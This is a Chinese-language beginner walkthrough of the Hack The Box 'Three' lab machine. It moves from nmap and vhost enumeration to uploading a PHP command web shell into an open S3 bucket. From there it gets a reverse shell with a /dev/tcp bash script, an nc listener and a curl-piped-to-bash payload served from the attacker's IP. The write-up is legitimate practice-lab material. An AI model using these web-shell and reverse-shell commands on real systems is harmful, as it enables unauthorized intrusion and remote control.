Hack The Box - Three(新手友好)
环境给了一个IP,nmap信息搜集一波
nmap -sS -sV 10.129.126.35
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp open httpApache httpd 2.4.29 ((Ubuntu))
访问10.129.126.35:80,收集有用信息(渗透测试==信息收集)
Phone: +01 343 123 6102
Email: mail@thetoppers.htb
thetoppers.htb应该是域名,把域名和IP加到hosts文件中,tee命令的作用就是读取标准输入内容,将读取到的内容数据写入到标准输出和文件中。
echo "10.129.126.35 thetoppers.htb" | tee -a /etc/hosts
再次访问和之前页面一样,尝试子域名爆破,有没有其他突破口
gobuster vhost -w /usr/share/wordlists/dict/subnames.txt -u http://thetoppers.htb
爆破的很久最终爆破结果有s3.thetoppers.htb,加hosts
echo "10.129.126.35 s3.thetoppers.htb" | tee -a /etc/hosts
页面只有一条json信息。看看s3,s3是亚马逊云存储的简单存储服务,全程是Simple Storage Service。
{"status": "running"}
我们就可以通过awscli来与s3进行交互,安装并将所有字段随意配置(服务器可能不校验)。
aws configure
列出所有s3的桶
aws --endpoint=http://s3.thetoppers.htb s3 ls
列出该s3下的目录及对象
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
创建一句话shell
echo'<?php system($_GET["cmd"]); ?>' > shell.php
使用cp命令拷贝到s3的桶里
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
访问http://thetoppers.htb/shell.php?cmd=ls可以看到thetoppers.htb桶里的目录及对象
images index.php shell.php
我们通过命令执行shell,curl执行bash脚本反弹shell来实现命令行交互。查看本机ip
ifconfig //10.10.16.60
生成bash一句话shell.sh
#!/bin/bash
bash-i >& /dev/tcp/10.10.16.60/1337 0>&1
nc监听端口
nc -nvlp 1337
python创建简易服务器
python3 -m http.server 8090
目标机curl本机bash文件并执行
http://thetoppers.htb/shell.php?cmd=curl%2010.10.16.60:8090/shell.sh%20|%20bash
如果成功的话可以看到我们监听的页面,如果没反弹成功可以看看10.10.16.60:8090是否有我们的shell.sh文件
www目录catflag即可。
Hack The Box - Three(新手友好)相关推荐
- PyTorch官方教程大更新:增加标签索引,更加新手友好
点击上方↑↑↑"视学算法"关注我 来源:公众号 量子位 授权 PyTorch官方教程,现已大幅更新: 提供标签索引,增加主题分类,更加新手友好. 不必再面对一整页教学文章茫然无措, ...
- C++ 的语言杂谈(一)--C++不是新手友好的
C++的语言品味是独特的,喜欢的人特别喜欢,讨厌的人特别讨厌.虽然Bjane Stroustrup不断地宣称C++的发展方向是新手友好的,但实际上对新手来说,最重要的还是有强大方便的标准库可以使用(像 ...
- 【Hack The Box】linux练习-- SneakyMailer
HTB 学习笔记 [Hack The Box]linux练习-- SneakyMailer
- Hack The Box - Access Writeup
第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗.收获还是很大,在此记录一下,以便后阅. 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21 ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
- 【Hack The Box】linux练习-- Blunder
HTB 学习笔记 [Hack The Box]linux练习-- Blunder
- Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch Hack The Box开始使用流程看这篇 文章目录 Hack The Box-Catch 整体思路 1.Nmap扫描 2.apk文件信息收集 3.lets ch ...
- 【Hack The Box】windows练习-- Silo
HTB 学习笔记 [Hack The Box]windows练习-- Silo
- 【Hack The Box】linux练习-- Ophiuchi
HTB 学习笔记 [Hack The Box]linux练习-- Ophiuchi
最新文章
- BZOJ1393 [Ceoi2008]knights
- VIM配置(不用这么麻烦了,文章尾部附带他人写得脚本安装)
- 如何安装 SAP Commerce Cloud,以便让 SAP Spartacus 使用
- vue 关闭弹如何销毁子组件_vue中的eventBus会产生内存泄漏吗
- Archlive新年第一棒: 基于2.6.37稳定内核的archlive20110107
- sqlplus登录缓慢的问题分析过程及解决小记
- idea下载github代码及切换分支
- 数学之路-数据分析进阶-转化率
- 计算机程序员 面试题库,计算机软考程序员面试题精选题2
- 算法分析与设计-实验一 递归与分治算法设计
- Python从ftp服务器下载文件的源码
- 用计算机和电视机组成家庭影院,家庭影院怎么连接电脑_家庭影院连接电脑详解【图文】-太平洋IT百科...
- Error: Canceled future for execute_request message before replies were done
- 重复率30%可以通过论文查重吗?
- ucharts 柱状图圆角_圆角柱状图
- 洛谷B2058 奥运奖牌计数
- 2021-2022学年广州市育才实验学校九年级第一学期期中考试英语试题
- 通过Kali Linux暴力破解WiFi密码
- TCP/UDP 端口
- Mac OS X的Spotlight综述